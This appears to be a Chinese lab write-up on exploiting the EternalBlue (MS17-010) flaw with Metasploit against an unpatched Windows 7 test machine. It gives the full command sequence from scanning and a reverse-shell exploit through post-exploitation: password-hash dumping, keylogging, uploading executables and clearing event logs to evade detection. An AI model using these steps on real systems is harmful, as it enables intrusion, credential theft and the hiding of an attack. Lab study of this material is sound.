目錄
- Metaploit介紹
- 實驗環境
- 漏洞利用過程
Metaploit介紹
本次測試主要是利用永恆之藍漏洞對windows7進行控制利用,掌握Metaploit工具的使用,知道永恆之藍的漏洞利用原理。永恆之藍是在Windows的SMB服務處理SMB v1請求時發生的漏洞,這個漏洞導致攻擊者在目標系統上可以執行任意代碼。通過永恆之藍漏洞會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。
進入metaploit命令:msfconsole,可以看出下面有總共有六個模塊,輔助模塊(auxiliary)、滲透攻擊模塊(exploits)、后滲透攻擊模塊(post)、攻擊載荷模塊(payloads)、空指令模塊(nops)、編碼器模塊(encoders),其中msf為總模塊,其他均為分支模塊。
實驗環境
攻擊機:192.168.202.132 (Kali安裝Metaploit工具)
靶機:192.168.202.131 (windows7x64未打永恆之藍補丁且關閉防火牆)
實戰漏洞利用
1.進入metaploit工具使用命令:msfconsole,可以看出下面有總共有六個模塊,不同的模塊功能使用的側重點一樣,在進行不同的探測之前使用不同的模塊。
輔助模塊(auxiliary)、滲透攻擊模塊(exploits)、后滲透攻擊模塊(post)、攻擊載荷模塊(payloads)、空指令模塊(nops)、編碼器模塊(encoders),其中msf為總模塊,其他均為分支模塊。Metaploit的版本號為metasploit v4.17.3-dev
>>>msfconsole
2.在進行攻擊利用之前,首先確實目標是否開放445端口,該漏洞Ms17-010是否存在,先做好簡單的信息收集更能成功利用目標主機。
nmap探測主機信息
>>>nmap -sV 192.168.202.131
====>>>445端口開放,目的主機為windows7系統,推測存在ms17-010漏洞
利用msf的auxiliary模塊進行漏洞驗證
>>>search ms17-010
搜索有關漏洞的模塊,結果看到很多有關該漏洞的不同模塊,可以使用auxiliary/scanner/smb/smb_ms17_010 進行驗證
>>>use auxiliary/scanner/smb/smb_ms17_010
>>>set rhost 192.168.202.131
>>>set rport 445
配置好之后,使用>>>run 探測一下查看結果存在該漏洞
3.驗證存在漏洞之后,就可以利用永恆之藍漏洞,使用其中的滲透攻擊(exploit)模塊,對其進行滲透攻擊
a.設置攻擊目標、端口、本機
>>>use exploit/windows/smb/ms17_010_eternalblue
b.使用exp進行攻擊時,要使用payload作為子彈進行攻擊
>>>set payload windows/x64/meterpreter/reverse_tcp
c.查看具體配置是否完整
>>>show options
d.進行攻擊
>>>run
soga 進去了,看樣子差不多可以嘿嘿嘿了*-*
4.進入shell,獲取命令行,可以看到直接獲得system權限
meterpreter是metasploit框架中的一個擴展模塊,作為溢出成功后的攻擊載荷使用,攻擊載荷在溢出攻擊成功以后給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個meterpreter shell的鏈接。
a.從上面看出已經攻入成功,可以輸入:sysinfo查看系統信息
meterpreter > sysinfo
b.反彈shell
meterpreter >shell
meterpreter shell作為滲透模塊有很多有用的功能,比如:添加一個用戶、隱藏一些東西、打開shell、得到用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、得到遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。另外meterpreter能夠躲避入侵檢測系統。在遠程主機上隱藏自己,它不改變系統硬盤中的文件,因此HIDS(基於主機的入侵檢測系統) 很難對它做出響應。此外它在運行的時候系統時間是變化的,所以跟蹤它或者終止它對於一個有經驗的人也會變得非常困難。
5.shell利用
(1).新建用戶、獲得用戶密碼
a.密碼為進入hash加密值,可以利用在線解密進行破解
meterpreter > hashdump
可以看到用戶名,密碼,hash解碼就可以拿到密碼了
b.進入shell新建用戶
c. 捕捉屏幕:screenhot
到這個路徑下查看,可以看到返回的圖片
d.獲取按鍵信息
開始獲取:keyscan_start
下載內容:keyscan_dump
沒有獲取到,應該需要在捕獲的同時需要進行鍵盤操作
e.上傳文件
“upload”命令為上傳文件到靶機下(例如黑客上傳一個勒索病毒WannaCry),測試上傳了一個hack.exe文件到,可以直接執行
f. 清除事件日志
執行“clearev”命令,將清除事件日志。